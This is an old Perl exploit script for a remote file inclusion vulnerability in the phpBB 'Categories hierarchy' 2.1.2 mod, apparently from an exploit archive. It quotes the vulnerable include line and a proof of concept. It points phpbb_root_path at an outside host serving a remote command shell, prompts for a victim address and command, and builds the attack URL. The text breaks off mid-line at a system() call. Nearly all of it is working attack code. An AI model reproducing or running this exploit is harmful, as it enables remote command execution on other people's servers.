1 # (C) xoron
2 #
3 # [Name: Categories hierarchy v2.1.2 (phpbb_root_path) Remote File Include Exploit]
4 #
5 # [Script name: Ptifo mod−CH_212_installed
6 #
7 # [Author: xoron]
8 # [Exploit coded by xoron]
9 #
10 # [Download: http://sourceforge.net/project/showfiles.php?group_id=125710]
11 #
12 # [xoron.biz − xoron.info]
13 #
14 # [Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn]
15 #
16 # [Tesekkurler: chaos, pang0, DJR]
17 #
18 # [POC: /includes/class_template.php?phpbb_root_path=http://evilscripts?]
19 #
20 # [Vuln Codes: include($phpbb_root_path . ’includes/template.’ . $phpEx); ]
21 #
22 #
23 $rfi = "class_template.php?phpbb_root_path=";
24 $path = "/includes/";
25 $shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
26 print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil);
27 if($dil eq "English"){
28 print "(c) xoron\n";
29 &ex;
30 }
31 elsif($dil eq "Turkish"){
32 print "Kodlayan xoron\n";
33 &ex;
34 }
35 else {print "Plz Select Languge\n"; exit;}
36 sub ex{
37 $not = "Victim is Not Vunl.\n" and $not_cmd = "Victim is Vunl but Not doing Exec.\n"
38 and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
39 if $dil eq "English";
40 $not = "Adreste RFI acigi Yok\n" and $not_cmd = "Adresde Acýk Var Fakat Kod Calismiyor\n"
41 and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
42 if $dil eq "Turkish";
43 print "$vic";
44 $victim = <STDIN>;
45 chop($victim);
46 print "$diz";
47 $dizn = <STDIN>;
48 chop($dizn);
49 $dizin = $dizn;
50 $dizin = "/" if !$dizn;
51 print "$komt";
52 $cmd = <STDIN>;
Page 1/2
Categories hierarchy phpBB Mod 2.1.2 phpbb_root_path RFI Exploit
xoron
02/05/2007
53 chop($cmd);
54 $cmmd = $cmd;
55 $cmmd = "dir" if !$cmd;
56 $site = $victim;
57 $site = "http://$victim" if !($victim =~ /http/);
58 $acacaz = "$site$dizin$rfi$shell$cmmd";
59 print "(c) xoron.info − xoron.biz\n$thx: pang0, chaos, can bjorn\n";
60 sleep 3;
61 system("star